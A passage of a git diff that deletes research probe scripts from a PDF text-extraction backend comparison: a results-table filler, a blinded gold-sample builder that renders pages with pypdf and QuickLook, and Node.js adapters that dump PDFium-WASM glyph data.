DOC.write_text(text) - print(f"wrote {DOC}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/fill_results.py b/docs/research/pdf-backend-bakeoff/probes/fill_results.py deleted file mode 100644 index ac4a1d35..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/fill_results.py +++ /dev/null @@ -1,184 +0,0 @@ -"""Fill RESULTS.md's table placeholders from the raw result JSON. - -Generated rather than transcribed, so the published tables cannot drift from the runs -that produced them. Idempotent: it replaces the block between each marker and its -closing marker, so it can be re-run after a re-scored phase. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fill_results.py -""" - -from __future__ import annotations - -import json -import statistics -from pathlib import Path - -HERE = Path(__file__).resolve().parent -DOC = HERE.parent / "RESULTS.md" -RESULTS = HERE.parent / "results" -INCUMBENT = "pdfium-native" -LABEL = { - "pdfium-native": "pdfium-native *(incumbent)*", - "pdfium-wasm": "**pdfium-wasm**", - "pdfminer": "**pdfminer**", - "pymupdf": "pymupdf *(ceiling)*", - "pdfjs": "pdfjs", - "pypdf": "pypdf", -} - - -def mean(xs): - return statistics.mean(xs) if xs else float("nan") - - -def t4_table(data: dict) -> str: - pairs = data["pairs"] - backends = data["backends"] - mode = "repaired" - - def cell(p, b, *keys): - e = pairs[p].get(f"{b}/{mode}") - if not e or "error" in e: - return None - for k in keys: - e = e.get(k) if isinstance(e, dict) else None - if e is None: - return None - return e - - scored = [p for p in pairs if cell(p, INCUMBENT, "T2_amount_entries", "f1") is not None] - declined = [p for p in pairs if p not in scored] - - rows = [ - f"Scored on **{len(scored)} of {data['n_pairs']}** pairs. " - f"{len(declined)} declined by the production unnumbered-layout guard" - + (f" ({', '.join(declined)})" if declined else "") - + ".", - "", - "| Backend | amounts identical | changes identical | amount F1 | change F1 |", - "|---|---|---|---|---|", - ] - for b in backends: - if b == INCUMBENT: - rows.append(f"| {LABEL[b]} | (reference) | (reference) | — | — |") - continue - ai = [x for x in (cell(p, b, "T4_vs_incumbent", "identical_amounts") for p in scored) if x is not None] - ci = [x for x in (cell(p, b, "T4_vs_incumbent", "identical_changes") for p in scored) if x is not None] - af = [x for x in (cell(p, b, "T4_vs_incumbent", "amount_entries", "f1") for p in scored) if x is not None] - cf = [x for x in (cell(p, b, "T4_vs_incumbent", "change_signatures", "f1") for p in scored) if x is not None] - mark = "**" if ai and sum(ai) == len(ai) else "" - rows.append( - f"| {LABEL[b]} | {mark}{sum(ai)}/{len(ai)}{mark} | {sum(ci)}/{len(ci)} | {mean(af):.4f} | {mean(cf):.4f} |" - ) - return "\n".join(rows) - - -def t2_table(data: dict) -> str: - import sys - - sys.path.insert(0, str(HERE)) - from report_phase2 import quoted_block_pairs - - qb = quoted_block_pairs() - pairs = data["pairs"] - backends = data["backends"] - mode = "repaired" - - def cell(p, b, *keys): - e = pairs[p].get(f"{b}/{mode}") - if not e or "error" in e: - return None - for k in keys: - e = e.get(k) if isinstance(e, dict) else None - if e is None: - return None - return e - - def stratum(p): - n_ref = cell(p, INCUMBENT, "T2_amount_entries", "n_reference") - n_cand = cell(p, INCUMBENT, "T2_amount_entries", "n_candidate") - if n_ref is None: - return None - if not n_ref and not n_cand: - return "empty_both" - if not n_ref: - return "xml_found_none" - return "substantive_qb" if p in qb else "substantive_clean" - - notes = { - "substantive_clean": "real amounts, XML reference **sound** — the informative population", - "substantive_qb": "real amounts, XML reference carries `` (known parser drop)", - "xml_found_none": "XML found no amounts; F1 is an empty-denominator artifact", - "empty_both": "neither side found amounts; F1 trivially 1.0, no information", - } - out = [] - for label in ("substantive_clean", "substantive_qb", "xml_found_none", "empty_both"): - ps = [p for p in pairs if stratum(p) == label] - if not ps: - continue - out.append(f"**`{label}`** (n={len(ps)}) — {notes[label]}") - out.append("") - out.append("| Backend | mean F1 | min F1 | perfect |") - out.append("|---|---|---|---|") - for b in backends: - f1 = [x for x in (cell(p, b, "T2_amount_entries", "f1") for p in ps) if x is not None] - if not f1: - continue - out.append(f"| {LABEL[b]} | {mean(f1):.4f} | {min(f1):.4f} | {sum(1 for x in f1 if x == 1.0)}/{len(f1)} |") - out.append("") - return "\n".join(out).rstrip() - - -def tierb_block(data: dict) -> str: - docs = data["documents"] - backends = [b for b in next(iter(docs.values())) if b != INCUMBENT] - out = [ - f"Measured on **{len(docs)}** non-corpus documents with no XML reference: the " - "watermarked committee report `CRPT-118srpt198`, the watermarked Senate bill " - "`BILLS-118s4795rs`, and nine House-reported subcommittee prints. The spec asks " - "for the first two by name; the nine are additional **Tier A** print-class " - "variety, as the spec itself classifies them.", - "", - "| Backend | opened | text identical to incumbent | line numbers identical | mean breadcrumb agreement |", - "|---|---|---|---|---|", - ] - n = len(docs) - for b in backends: - ok = [v[b] for v in docs.values() if b in v and "error" not in v[b]] - ti = sum(1 for r in ok if r["vs_incumbent"] and r["vs_incumbent"]["text_identical"]) - li = sum(1 for r in ok if r["vs_incumbent"] and r["vs_incumbent"]["line_numbers_identical"]) - bc = [ - r["vs_incumbent"]["breadcrumb_agreement"] - for r in ok - if r["vs_incumbent"] and r["vs_incumbent"]["breadcrumb_agreement"] is not None - ] - out.append(f"| {LABEL.get(b, b)} | {len(ok)}/{n} | {ti}/{len(ok)} | {li}/{len(ok)} | {mean(bc):.4f} |") - return "\n".join(out) - - -def splice(text: str, marker: str, block: str) -> str: - start = f"" - end = f"" - if start not in text: - return text - head, rest = text.split(start, 1) - tail = rest.split(end, 1)[1] if end in rest else rest - return f"{head}{start}\n\n{block}\n\n{end}{tail}" - - -def main() -> None: - doc = DOC.read_text() - p2 = RESULTS / "phase2.json" - if p2.exists(): - data = json.loads(p2.read_text()) - doc = splice(doc, "T4_TABLE", t4_table(data)) - doc = splice(doc, "T2_TABLE", t2_table(data)) - tb = RESULTS / "tierb.json" - if tb.exists(): - doc = splice(doc, "TIERB", tierb_block(json.loads(tb.read_text()))) - DOC.write_text(doc) - print(f"filled {DOC}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/gold_build.py b/docs/research/pdf-backend-bakeoff/probes/gold_build.py deleted file mode 100644 index 0b4500e4..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/gold_build.py +++ /dev/null @@ -1,417 +0,0 @@ -"""Build the image-adjudicated gold sample: frame, strata, seeded draw, blind/key split. - -PRE-REGISTRATION-CONFIRMATORY.md, "The gold sample". - -Naming, honestly: the protocol asked for a HUMAN-adjudicated sample and no human is at the -keyboard. What this builds is an IMAGE-adjudicated sample. The adjudicator reads page -images rendered by Apple's QuickLook/CoreGraphics -- an implementation independent of -PDFium, pdfminer, PyMuPDF and PDF.js -- and pypdf is used only to split one page out of a -document, which is structural manipulation, not text extraction. - -BLINDING. The frame is built from backend output, so this script knows every candidate's -answer. The adjudicator must not, and the split is what enforces it: - - gold_key.json document, page, WHICH backends contributed and WHAT each said, the - XML value, and the stratum. Written, committed, then not opened - until scoring. - gold_blind.json document, page, rendered image path, a bounding-box locator, and the - question. Nothing else. This is all the adjudicator sees. - -A bounding box says WHERE to look without saying WHAT is there. Items are emitted in a -seeded cross-stratum shuffle so neighbouring items do not reveal which cell -- and -therefore which expected difficulty -- an item came from. - -Ordering is enforced by COMMIT ORDER, not by intent: gold_adjudicated.json is committed -before gold_key.json is joined to it. See the reviewer kit in the preregistration. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/gold_build.py -""" - -from __future__ import annotations - -import argparse -import json -import random -import re -import subprocess -import sys -from collections import defaultdict -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -from contract import ALL_BACKENDS, UPRIGHT, run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase1 import corpus_documents # noqa: E402 - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 - -SEED = 20260805 -_AMOUNT = re.compile(r"\$[\d,]+(?:\.\d+)?") - -FINANCIAL_STRATA = { - "disagree": 10, - "long_block": 8, - "heading_transition": 8, - "page_boundary": 8, - "soft_hyphen": 6, - "watermark": 6, - "table_like": 4, -} -STRUCTURAL_STRATA = { - "disagree": 10, - "small_caps": 12, - "agency": 8, - "page_boundary": 8, - "watermark": 6, - "grouping_or_title": 6, -} - - -def watermarked(raw_pages) -> set[int]: - """Pages carrying the rotated left-gutter watermark, by non-upright glyphs.""" - return {p.page_number for p in raw_pages if any(not g[UPRIGHT] for g in p.glyphs)} - - -def collect(doc_key: str, pdf: Path) -> dict: - """Per-backend view of one document: amount lines and heading anchors.""" - per_backend: dict[str, dict] = {} - wm: set[int] = set() - for backend in ALL_BACKENDS: - try: - raw, _ = run_backend(backend, pdf) - except Exception as exc: # noqa: BLE001 - per_backend[backend] = {"error": str(exc)} - continue - wm |= watermarked(raw) - pages, _ = reconstruct(raw, repaired=True) - if _is_unnumbered_layout(pages): - per_backend[backend] = {"declined": True} - continue - amounts, lines = {}, {} - for page in pages: - for ln in page.print_lines: - if ln.line_number is None: - continue - key = (page.page_number, ln.line_number) - lines[key] = ln.text - found = _AMOUNT.findall(ln.text or "") - if found: - amounts[key] = found - anchors = { - (a.page_number, a.line_number): {"kind": a.kind, "text": a.text} - for a in extract_anchors(pages) - if a.kind in M.PDF_HEADING_KINDS and a.line_number is not None - } - per_backend[backend] = {"amounts": amounts, "lines": lines, "anchors": anchors} - return {"doc": doc_key, "backends": per_backend, "watermarked_pages": sorted(wm)} - - -def assign_financial(view: dict) -> dict[tuple, dict]: - """One candidate item per (page, line) any backend saw an amount on.""" - good = {b: v for b, v in view["backends"].items() if "amounts" in v} - if not good: - return {} - wm = set(view["watermarked_pages"]) - items: dict[tuple, dict] = {} - all_keys = set().union(*[set(v["amounts"]) for v in good.values()]) - - ref = good.get("pdfium-native") or next(iter(good.values())) - anchor_lines = sorted(set().union(*[set(v["anchors"]) for v in good.values()])) - max_line = {} - for v in good.values(): - for pg, ln in v["lines"]: - max_line[pg] = max(max_line.get(pg, 0), ln) - - # Distance-since-last-heading must be counted in DOCUMENT order, not within a page. - # Computed per page it can never exceed a page's ~25 printed lines, so the >40 test for - # "deep inside a long appropriations block" was structurally incapable of firing and the - # stratum drew a frame of 0 twice before this was noticed. A global ordinal over every - # printed line lets the distance cross page boundaries, which is where long blocks live. - all_lines = sorted(set().union(*[set(v["lines"]) for v in good.values()])) - seq = {k: i for i, k in enumerate(all_lines)} - anchor_seq = sorted(seq[k] for k in anchor_lines if k in seq) - - for key in sorted(all_keys): - page, line = key - texts = {b: v["lines"].get(key) for b, v in good.items()} - amts = {b: tuple(v["amounts"].get(key, ())) for b, v in good.items()} - contributors = [b for b, v in good.items() if key in v["amounts"]] - disagree = len(set(amts.values())) > 1 or len({t for t in texts.values() if t}) > 1 - - import bisect - - here = seq.get(key) - j = bisect.bisect_right(anchor_seq, here) - 1 if here is not None else -1 - dist = (here - anchor_seq[j]) if (here is not None and j >= 0) else None - txt = ref["lines"].get(key) or next((t for t in texts.values() if t), "") or "" - - # Assignment is first-match, so the ORDER decides which strata can fill. An earlier - # version ran common-first (watermark, soft_hyphen before table_like, long_block) and - # starved the rare cells outright: long_block drew a frame of 0 and table_like of 1 - # against targets of 8 and 4, because nearly every GPO page carries the rotated - # watermark and most lines end in a hyphen. Rare and structurally interesting cells - # are tested first; the broad ones mop up. - if disagree: - stratum = "disagree" - elif dist is not None and dist > 40: - stratum = "long_block" - elif len(_AMOUNT.findall(txt)) >= 3: - stratum = "table_like" - elif dist is not None and dist <= 3: - stratum = "heading_transition" - elif line <= 2 or (page in max_line and line >= max_line[page] - 1): - stratum = "page_boundary" - elif txt.rstrip().endswith("-"): - stratum = "soft_hyphen" - elif page in wm: - stratum = "watermark" - else: - continue - items[key] = { - "kind": "financial", - "stratum": stratum, - "page": page, - "line": line, - "contributors": sorted(contributors), - "backend_text": texts, - "backend_amounts": {b: list(a) for b, a in amts.items()}, - } - return items - - -def assign_structural(view: dict) -> dict[tuple, dict]: - good = {b: v for b, v in view["backends"].items() if "anchors" in v} - if not good: - return {} - wm = set(view["watermarked_pages"]) - items: dict[tuple, dict] = {} - all_keys = set().union(*[set(v["anchors"]) for v in good.values()]) - max_line: dict[int, int] = {} - for v in good.values(): - for pg, ln in v["lines"]: - max_line[pg] = max(max_line.get(pg, 0), ln) - - for key in sorted(all_keys): - page, line = key - seen = {b: v["anchors"].get(key) for b, v in good.items()} - kinds = {(s or {}).get("kind") for s in seen.values()} - texts = {(s or {}).get("text") for s in seen.values()} - contributors = [b for b, s in seen.items() if s] - disagree = len(contributors) != len(good) or len(kinds) > 1 or len(texts) > 1 - kind = next((k for k in kinds if k), None) - line_text = next((v["lines"].get(key) for v in good.values() if v["lines"].get(key)), "") or "" - # GPO sets account headings in faux small caps, and the reconstructed text of one - # is all-uppercase. The size signature that actually distinguishes them lives in - # the glyphs, which this frame does not carry, so uppercase is the proxy and is - # named as such rather than dressed up. - smallcaps = bool(line_text) and line_text.strip().isupper() - - if disagree: - stratum = "disagree" - elif kind == "agency": - stratum = "agency" - elif kind == "grouping": - stratum = "grouping_or_title" - elif line <= 2 or (page in max_line and line >= max_line[page] - 1): - stratum = "page_boundary" - elif page in wm: - stratum = "watermark" - elif kind == "account" and smallcaps: - stratum = "small_caps" - else: - continue - items[key] = { - "kind": "structural", - "stratum": stratum, - "page": page, - "line": line, - "contributors": sorted(contributors), - "backend_anchor": {b: s for b, s in seen.items()}, - "line_text": line_text, - } - return items - - -def render_page(pdf: Path, page_number: int, dest: Path) -> bool: - """One page, split by pypdf then rasterized by QuickLook/CoreGraphics. - - Neither step is a text extractor, and CoreGraphics shares no code with any candidate. - sips renders the page with a transparent background that flattens to solid black in - PNG, which is unreadable; qlmanage composites onto white. - """ - from pypdf import PdfReader, PdfWriter - - dest.parent.mkdir(parents=True, exist_ok=True) - one = dest.with_suffix(".page.pdf") - reader = PdfReader(str(pdf)) - if page_number > len(reader.pages): - return False - writer = PdfWriter() - writer.add_page(reader.pages[page_number - 1]) - with open(one, "wb") as fh: - writer.write(fh) - subprocess.run( - ["qlmanage", "-t", "-s", "2000", "-o", str(dest.parent), str(one)], - capture_output=True, - timeout=120, - ) - produced = dest.parent / (one.name + ".png") - if produced.exists(): - produced.rename(dest) - one.unlink(missing_ok=True) - return True - one.unlink(missing_ok=True) - return False - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out-dir", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results") - ap.add_argument("--render-dir", type=Path, default=None) - ap.add_argument("--limit-docs", type=int, default=None) - ap.add_argument( - "--render-only", - action="store_true", - help="re-render page images from an existing gold_blind.json and exit. The frozen " - "sample is the JSON; the PNGs are ~29 MB of deterministic output and are gitignored, " - "so this recreates them without rebuilding (or perturbing) the sample.", - ) - args = ap.parse_args() - - render_dir = args.render_dir or (REPO / "docs/research/pdf-backend-bakeoff/results/gold_pages") - - if args.render_only: - blind = json.loads((args.out_dir / "gold_blind.json").read_text()) - key = json.loads((args.out_dir / "gold_key.json").read_text()) - pdf_by_doc = {i["doc"]: REPO / i["pdf"] for i in key["items"]} - n = 0 - for item in blind["items"]: - img = render_dir / f"{item['document'].replace('/', '_')}_p{item['page']}.png" - if img.exists(): - continue - src = pdf_by_doc.get(item["document"]) - if src and render_page(src, item["page"], img): - n += 1 - print(f"re-rendered {n} page images into {render_dir}") - return - docs = corpus_documents() - if args.limit_docs: - docs = docs[: args.limit_docs] - - frame: list[dict] = [] - unlocatable_xml_headings = 0 - for i, (bill, version, pdf, xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - view = collect(key, pdf) - fin = assign_financial(view) - st = assign_structural(view) - if not fin and not st: - print(f" [{i}/{len(docs)}] {key:<28} skipped (declined or empty)", file=sys.stderr) - continue - try: - ref = M.xml_reference(xml) - found = set() - for v in view["backends"].values(): - for a in (v.get("anchors") or {}).values(): - found.add(M.norm_label(a["text"])) - unlocatable_xml_headings += len(ref["labels"] - found) - except Exception: # noqa: BLE001 - pass - for item in list(fin.values()) + list(st.values()): - frame.append({"doc": key, "pdf": str(pdf.relative_to(REPO)), **item}) - print(f" [{i}/{len(docs)}] {key:<28} financial={len(fin)} structural={len(st)}", file=sys.stderr) - - by_stratum: dict[tuple[str, str], list[dict]] = defaultdict(list) - for item in frame: - by_stratum[(item["kind"], item["stratum"])].append(item) - - rng = random.Random(SEED) - sample: list[dict] = [] - frame_report = {} - for kind, strata in (("financial", FINANCIAL_STRATA), ("structural", STRUCTURAL_STRATA)): - for stratum, n in strata.items(): - pool = sorted(by_stratum.get((kind, stratum), []), key=lambda d: (d["doc"], d["page"], d["line"])) - idx = list(range(len(pool))) - rng.shuffle(idx) - taken = [pool[j] for j in idx[:n]] - for rank, item in enumerate(taken): - item["_frame_size"] = len(pool) - item["_selection_index"] = rank - sample.append(item) - frame_report[f"{kind}/{stratum}"] = {"frame": len(pool), "target": n, "taken": len(taken)} - print(f" {kind}/{stratum:20} frame={len(pool):5} target={n} taken={len(taken)}", file=sys.stderr) - - rng.shuffle(sample) - for n, item in enumerate(sample, 1): - item["item_id"] = f"G{n:03d}" - - args.out_dir.mkdir(parents=True, exist_ok=True) - key_path = args.out_dir / "gold_key.json" - blind_path = args.out_dir / "gold_blind.json" - - key_path.write_text( - json.dumps( - { - "seed": SEED, - "frame_report": frame_report, - "unlocatable_xml_headings": unlocatable_xml_headings, - "note": "NOT READ BY THE ADJUDICATOR until gold_adjudicated.json is committed.", - "items": sample, - }, - indent=1, - default=str, - ) - ) - - blind_items = [] - rendered = 0 - for item in sample: - pdf = REPO / item["pdf"] - img = render_dir / f"{item['doc'].replace('/', '_')}_p{item['page']}.png" - if not img.exists(): - if render_page(pdf, item["page"], img): - rendered += 1 - q = ( - "Record the printed line number, the exact text of that printed line, the " - "amount(s) as printed, and the enclosing account/agency heading as printed." - if item["kind"] == "financial" - else "Record the printed line number, the exact text of that printed line, " - "whether it is a heading, and the heading immediately above it in the printed page." - ) - blind_items.append( - { - "item_id": item["item_id"], - "document": item["doc"], - "page": item["page"], - "image": str(img.relative_to(REPO)) if img.exists() else None, - "locator_printed_line": item["line"], - "question": q, - } - ) - blind_path.write_text( - json.dumps( - { - "seed": SEED, - "renderer": "pypdf page split + qlmanage (QuickLook/CoreGraphics)", - "note": "No backend name, no candidate text, no XML value, no stratum label.", - "items": blind_items, - }, - indent=1, - ) - ) - - pages = {(b["document"], b["page"]) for b in blind_items} - print(f"\nsample: {len(sample)} items across {len(pages)} distinct pages ({rendered} newly rendered)") - print(f"wrote {key_path}") - print(f"wrote {blind_path}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/js/.gitignore b/docs/research/pdf-backend-bakeoff/probes/js/.gitignore deleted file mode 100644 index 504afef8..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/.gitignore +++ /dev/null @@ -1,2 +0,0 @@ -node_modules/ -package-lock.json diff --git a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_hybrid_wasm.mjs b/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_hybrid_wasm.mjs deleted file mode 100644 index 72473439..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_hybrid_wasm.mjs +++ /dev/null @@ -1,144 +0,0 @@ -// Backend adapter: PDFium-WASM emitting the HYBRID contract (contract_hybrid.py). -// -// The portability half of the experiment. `backends/pdfium_hybrid.py` shows the indexed -// text-plus-geometry contract is available from native PDFium; this shows the same -// contract is available from the browser-shippable WASM build with no custom wrapper -// work -- every entry point it needs is already exported by @embedpdf/pdfium. -// -// Emits JSONL, one object per page: -// {"page_number":1,"width":612,"height":792, -// "chars":[[cp,generated,baseline,x0,x1,size,vbox,font,upright],...]} -// then a final {"summary":{...}} line. Field order matches contract_hybrid.CHAR_FIELDS. -// -// Run: node dump_pdfium_hybrid_wasm.mjs [--limit N] - -import { readFileSync } from "node:fs"; -import { createRequire } from "node:module"; - -const require = createRequire(import.meta.url); -const { init } = require("@embedpdf/pdfium"); - -const args = process.argv.slice(2); -const pdfPath = args[0]; -const limitIdx = args.indexOf("--limit"); -const limit = limitIdx >= 0 ? parseInt(args[limitIdx + 1], 10) : null; - -const pdfium = await init({ wasmBinary: readFileSync(require.resolve("@embedpdf/pdfium/pdfium.wasm")) }); -pdfium.PDFiumExt_Init?.(); - -const data = new Uint8Array(readFileSync(pdfPath)); -const dataPtr = pdfium.pdfium.wasmExports.malloc(data.length); -pdfium.pdfium.HEAPU8.set(data, dataPtr); -const doc = pdfium.FPDF_LoadMemDocument(dataPtr, data.length, ""); -if (!doc) { - console.error("FPDF_LoadMemDocument failed"); - process.exit(2); -} - -const nPages = pdfium.FPDF_GetPageCount(doc); -const total = limit ? Math.min(limit, nPages) : nPages; - -const boxPtr = pdfium.pdfium.wasmExports.malloc(32); -const matPtr = pdfium.pdfium.wasmExports.malloc(24); -const orgPtr = pdfium.pdfium.wasmExports.malloc(16); -const namePtr = pdfium.pdfium.wasmExports.malloc(256); -const flagsPtr = pdfium.pdfium.wasmExports.malloc(4); - -const SOFT_HYPHEN = 0x00ad; -const t0 = performance.now(); -let charTotal = 0; -let generatedTotal = 0; -let hyphenTotal = 0; -let mapErrorTotal = 0; -let emptyFonts = 0; -let unnamed = 0; - -for (let p = 0; p < total; p++) { - const page = pdfium.FPDF_LoadPage(doc, p); - const tp = pdfium.FPDFText_LoadPage(page); - const width = pdfium.FPDF_GetPageWidthF(page); - const height = pdfium.FPDF_GetPageHeightF(page); - const n = pdfium.FPDFText_CountChars(tp); - const fontCache = new Map(); - const chars = []; - - for (let i = 0; i < Math.max(n, 0); i++) { - let cp = pdfium.FPDFText_GetUnicode(tp, i); - const generated = pdfium.FPDFText_IsGenerated(tp, i) === 1; - const hyphen = pdfium.FPDFText_IsHyphen(tp, i) === 1; - if (pdfium.FPDFText_HasUnicodeMapError(tp, i) === 1) mapErrorTotal++; - if (hyphen) { - cp = SOFT_HYPHEN; - hyphenTotal++; - } else if (cp < 0x20 && !generated) { - cp = 0xfffd; - unnamed++; - } - - const okOrigin = pdfium.FPDFText_GetCharOrigin(tp, i, orgPtr, orgPtr + 8); - const originY = okOrigin ? pdfium.pdfium.getValue(orgPtr + 8, "double") : null; - const originX = okOrigin ? pdfium.pdfium.getValue(orgPtr, "double") : null; - - if (generated) { - // Same rule as the native adapter: a generated char keeps only its origin. Its - // box, matrix, size and font name are placeholders and are emitted as null so - // nothing downstream can consume them by accident. - generatedTotal++; - chars.push([cp, true, originY, originX, null, null, null, "", true]); - continue; - } - - const okBox = pdfium.FPDFText_GetCharBox(tp, i, boxPtr, boxPtr + 8, boxPtr + 16, boxPtr + 24); - const okMat = pdfium.FPDFText_GetMatrix(tp, i, matPtr); - if (!okBox || !okMat || !okOrigin) continue; - const left = pdfium.pdfium.getValue(boxPtr, "double"); - const right = pdfium.pdfium.getValue(boxPtr + 8, "double"); - const bottom = pdfium.pdfium.getValue(boxPtr + 16, "double"); - const top = pdfium.pdfium.getValue(boxPtr + 24, "double"); - const a = pdfium.pdfium.getValue(matPtr, "float"); - const b = pdfium.pdfium.getValue(matPtr + 4, "float"); - const size = pdfium.FPDFText_GetFontSize(tp, i) * Math.hypot(a, b); - - const len = pdfium.FPDFText_GetFontInfo(tp, i, namePtr, 256, flagsPtr); - let font = ""; - if (len > 0) { - const key = `${namePtr}:${len}`; - font = fontCache.get(key) ?? pdfium.pdfium.UTF8ToString(namePtr); - fontCache.set(key, font); - } else { - emptyFonts++; - } - - chars.push([cp, false, originY, left, right, r4(size), [bottom, top], font, Math.abs(b) < 1e-6 && a > 0]); - } - charTotal += chars.length; - - process.stdout.write( - JSON.stringify({ page_number: p + 1, width: r4(width), height: r4(height), chars }) + "\n", - ); - pdfium.FPDFText_ClosePage(tp); - pdfium.FPDF_ClosePage(page); -} - -process.stdout.write( - JSON.stringify({ - summary: { - backend: "pdfium-hybrid-wasm", - pages: total, - pages_total: nPages, - chars: charTotal, - generated_chars: generatedTotal, - hyphen_chars: hyphenTotal, - unicode_map_errors: mapErrorTotal, - unnamed_ink: unnamed, - empty_font_names: emptyFonts, - extract_ms: Math.round(performance.now() - t0), - }, - }) + "\n", -); - -pdfium.FPDF_CloseDocument(doc); - -function r4(x) { - return Math.round(x * 10000) / 10000; -} diff --git a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_wasm.mjs b/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_wasm.mjs deleted file mode 100644 index fff0476d..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_wasm.mjs +++ /dev/null @@ -1,155 +0,0 @@ -// Backend adapter: PDFium-WASM (@embedpdf/pdfium, MIT wrapper around BSD-3 PDFium). -// -// Emits the neutral PdfPage contract as JSONL on stdout, one JSON object per page: -// {"page_number":1,"width":612.0,"height":792.0,"glyphs":[[cp,x0,y0,x1,y1,baseline,size,font],...]} -// followed by a final {"summary":{...}} line. -// -// Phase 0 gate 1 for this backend is simply that it runs: the four FFI entry points the -// glyph sidecar needs (FPDFText_CountChars / GetCharBox / GetMatrix / GetFontSize) are -// exported by the shipped .wasm, and this probe calls them for real rather than reading -// the symbol table. -// -// Run: node dump_pdfium_wasm.mjs [--limit N] - -import { readFileSync } from "node:fs"; -import { createRequire } from "node:module"; - -const require = createRequire(import.meta.url); -const { init } = require("@embedpdf/pdfium"); - -const args = process.argv.slice(2); -const pdfPath = args[0]; -const limitIdx = args.indexOf("--limit"); -const limit = limitIdx >= 0 ? parseInt(args[limitIdx + 1], 10) : null; - -const wasmPath = require.resolve("@embedpdf/pdfium/pdfium.wasm"); -const wasmBinary = readFileSync(wasmPath); -const pdfium = await init({ wasmBinary }); - -pdfium.PDFiumExt_Init?.(); - -const data = new Uint8Array(readFileSync(pdfPath)); -const dataPtr = pdfium.pdfium.wasmExports.malloc(data.length); -pdfium.pdfium.HEAPU8.set(data, dataPtr); -const doc = pdfium.FPDF_LoadMemDocument(dataPtr, data.length, ""); -if (!doc) { - console.error("FPDF_LoadMemDocument failed"); - process.exit(2); -} - -const nPages = pdfium.FPDF_GetPageCount(doc); -const total = limit ? Math.min(limit, nPages) : nPages; - -// Scratch buffers reused across every glyph: 4 doubles for the char box, 6 floats for -// the matrix, a font-name buffer and an int for the font flags. -const boxPtr = pdfium.pdfium.wasmExports.malloc(32); -const matPtr = pdfium.pdfium.wasmExports.malloc(24); -const namePtr = pdfium.pdfium.wasmExports.malloc(256); -const flagsPtr = pdfium.pdfium.wasmExports.malloc(4); - -const t0 = performance.now(); -let glyphTotal = 0; -let emptyFontNames = 0; -let undecodable = 0; -// Minimum box width (points) for a glyph to count as ink rather than a structural -// marker. PDFium's 0x0A/0x0D breaks measure exactly 0.0 wide; the narrowest real GPO -// glyph on this corpus (the soft hyphen) measures ~3.0. -const INK_WIDTH = 0.5; - -for (let p = 0; p < total; p++) { - const page = pdfium.FPDF_LoadPage(doc, p); - const textPage = pdfium.FPDFText_LoadPage(page); - const width = pdfium.FPDF_GetPageWidthF(page); - const height = pdfium.FPDF_GetPageHeightF(page); - const n = pdfium.FPDFText_CountChars(textPage); - - const glyphs = []; - // Font names repeat heavily within a page; cache by the (name, flags) the FFI returns - // so a 3000-glyph page makes a handful of string decodes rather than 3000. - const fontCache = new Map(); - - for (let i = 0; i < Math.max(n, 0); i++) { - let cp = pdfium.FPDFText_GetUnicode(textPage, i); - - if (!pdfium.FPDFText_GetCharBox(textPage, i, boxPtr, boxPtr + 8, boxPtr + 16, boxPtr + 24)) { - continue; - } - const left = pdfium.pdfium.getValue(boxPtr, "double"); - const right = pdfium.pdfium.getValue(boxPtr + 8, "double"); - const bottom = pdfium.pdfium.getValue(boxPtr + 16, "double"); - const top = pdfium.pdfium.getValue(boxPtr + 24, "double"); - - // Backend-neutral undecodable-glyph rule (see backends/pdfium_native.py): a control - // codepoint with a zero-width box is a structural marker and is dropped; one with - // real ink is a glyph this backend could not name, carried as U+FFFD so the loss is - // visible to the scorer. Keyed on ink, never on a codepoint value. - if (cp < 0x20) { - if (right - left < INK_WIDTH) continue; - cp = 0xfffd; - undecodable++; - } - - if (!pdfium.FPDFText_GetMatrix(textPage, i, matPtr)) continue; - const a = pdfium.pdfium.getValue(matPtr, "float"); - const b = pdfium.pdfium.getValue(matPtr + 4, "float"); - // matrix[5] (f) is the text-object origin y, i.e. the TRUE baseline, shared by every - // glyph on a printed line. The char-box bottom is not -- descenders sit below it and - // would split one line into two clusters. See the note in backends/pdfium_native.py. - const baseline = pdfium.pdfium.getValue(matPtr + 20, "float"); - // GPO defines fonts at size 1 and scales via the text matrix, so the true glyph - // size is GetFontSize x sqrt(a^2 + b^2) -- the same rule the native sidecar uses. - const fs = pdfium.FPDFText_GetFontSize(textPage, i); - const size = fs * Math.sqrt(a * a + b * b); - - // Font identity: FPDFText_GetFontInfo writes the PostScript name into a buffer and - // returns its byte length. A zero length is the "empty font name" case the source - // inventory warns about, counted here per backend. - const len = pdfium.FPDFText_GetFontInfo(textPage, i, namePtr, 256, flagsPtr); - let font = ""; - if (len > 0) { - const key = `${namePtr}:${len}`; - font = fontCache.get(key) ?? pdfium.pdfium.UTF8ToString(namePtr); - fontCache.set(key, font); - } else { - emptyFontNames++; - } - - // upright: the text matrix carries no rotation/skew component. - const upright = Math.abs(b) < 1e-6 && a > 0; - glyphs.push([cp, left, bottom, right, top, round4(baseline), round4(size), font, upright]); - } - glyphTotal += glyphs.length; - - process.stdout.write( - JSON.stringify({ - page_number: p + 1, - width: round4(width), - height: round4(height), - glyphs, 